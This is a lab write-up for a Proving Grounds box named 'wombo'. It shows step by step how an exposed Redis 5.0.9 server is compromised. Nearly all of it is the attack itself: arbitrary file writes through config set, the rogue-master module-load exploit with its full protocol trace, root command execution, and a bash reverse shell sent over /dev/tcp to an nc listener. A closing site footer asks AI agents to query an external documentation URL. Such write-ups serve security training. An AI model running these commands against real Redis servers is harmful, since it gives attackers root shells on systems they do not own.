# 5 :6379 redis

```
$ redis-cli -h 192.168.136.69
192.168.136.69:6379> info server

# Server
redis_version:5.0.9
[trunacted]
os:Linux 4.9.0-12-amd64 x86_64
arch_bits:64
tcp_port:6379
executable:/usr/local/bin/redis-server
config_file:/etc/redis/redis.conf

# no keyspaces

# checking dir 
192.168.136.69:6379> config get dir
1) "dir"
2) "/"

192.168.136.69:6379> config set dir /var/www/html/
OK
192.168.136.69:6379> config set dbfilename kashz.txt
OK
192.168.136.69:6379> set test "kashz"
OK
192.168.136.69:6379> save
OK
# can savfe file but server is nginx (not php) and we don't know where is :8080 hosted for nodejs shell

# can't use modules exploit as we don't have a way to push the .so to victim

# trying master-slave exploit
Using https://github.com/vulhub/redis-rogue-getshell

$ python3 redis-master.py -r 192.168.136.69 -p 6379 -L 192.168.49.136 -P 27017 -f RedisModulesSDK/exp.so -c "id"
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.49.136\r\n$5\r\n27017\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n3910caee278bcb57907d94b211bca5adc637c53e\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'-ERR Error loading the extension. Please check the server logs.\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'$40\r\nquid=0(root) gid=0(root) groups=0(root)\n\r\n'
quid=0(root) gid=0(root) groups=0(root)

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'+OK\r\n'

# rev shell
# tried a bunch finally this worked
$ python3 redis-master.py -r 192.168.136.69 -p 6379 -L 192.168.49.136 -P 27017 -f RedisModulesSDK/exp.so -c "bash -c 'bash -i >& /dev/tcp/192.168.49.136/6379 0>&1'"
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.49.136\r\n$5\r\n27017\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n53c88bb260c5a95b8f9ecc4701a957edb7236d44\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b"*2\r\n$11\r\nsystem.exec\r\n$54\r\nbash -c 'bash -i >& /dev/tcp/192.168.49.136/6379 0>&1'\r\n"

$ nc -lvnp 6379
listening on [any] 6379 ...
connect to [192.168.49.136] from (UNKNOWN) [192.168.136.69] 57340
bash: cannot set terminal process group (572): Inappropriate ioctl for device
bash: no job control in this shell
root@wombo:/# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
wombo
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/wombo/5-6379-redis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.